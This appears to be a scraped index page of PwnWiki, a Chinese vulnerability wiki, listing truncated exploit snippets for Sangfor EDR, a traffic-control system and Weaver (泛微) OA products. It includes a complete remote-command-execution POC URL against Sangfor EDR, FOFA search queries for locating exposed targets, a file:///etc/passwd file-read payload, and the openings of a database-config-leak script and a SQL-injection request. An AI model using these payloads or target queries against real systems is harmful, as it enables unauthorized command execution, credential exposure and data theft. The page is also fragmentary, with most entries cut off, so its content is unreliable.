深信服/SANGFOR 终端检测响应平台/EDR RCE漏洞
免费、自由、人人可编辑的漏洞库 , POC: https://x.x.x.x/tool/log/c.php?strip_slashes=system&host=id Fofa语法: title="SANGFOR终端检测响应平台" 免 ...
PwnWiki - 免費、自由、人人可編輯的漏洞庫 - pwnwiki.backup
-
-
流量管控系统0day/zh-hant
pwnwiki.com , 漏洞影响 流量管控系统 FOFA "”unierm_brand/logo.png”" 登录页面可以看到默认口令,上传处存在任意文件上传漏洞。 参考 https://mp.weixin.qq.com/s/9Hx13 ...
-
流量管控系统0day/en
pwnwiki.com , Vulnerability Impact Flow control system FOFA "”unierm_brand/logo.png”" The default password can be seen o ...
-
流量管控系统0day
免费、自由、人人可编辑的漏洞库--PwnWiki.com , 漏洞影响 流量管控系统 FOFA "”unierm_brand/logo.png”" 登录页面可以看到默认口令,上传处存在任意文件上传漏洞。 参考 https://mp.weix ...
-
泛微云桥任意文件读取漏洞
免费、自由、人人可编辑的漏洞库--PwnWiki.com , POC http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/pass ...
-
泛微ecology OA数据库配置信息泄露/zh-hant
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp存在未授权访问。 POC import base64 import requests import ast def req(url): headers ...
-
泛微ecology OA数据库配置信息泄露/zh-cn
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp 存在未授权访问 POC import base64 import requests import ast def req(url): headers ...
-
泛微ecology OA数据库配置信息泄露/en
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Use premise /mobile/DBconfigReader.jsp There is unauthorized access. POC import base64 im ...
-
泛微ecology OA数据库配置信息泄露
pwnwiki.com , 利用前提 /mobile/DBconfigReader.jsp存在未授权访问。 POC import base64 import requests import ast def req(url): headers ...
-
泛微OA WorkflowCenterTreeData接口注入(仅限oracle数据库)/zh-hant
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , EXP POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1 ...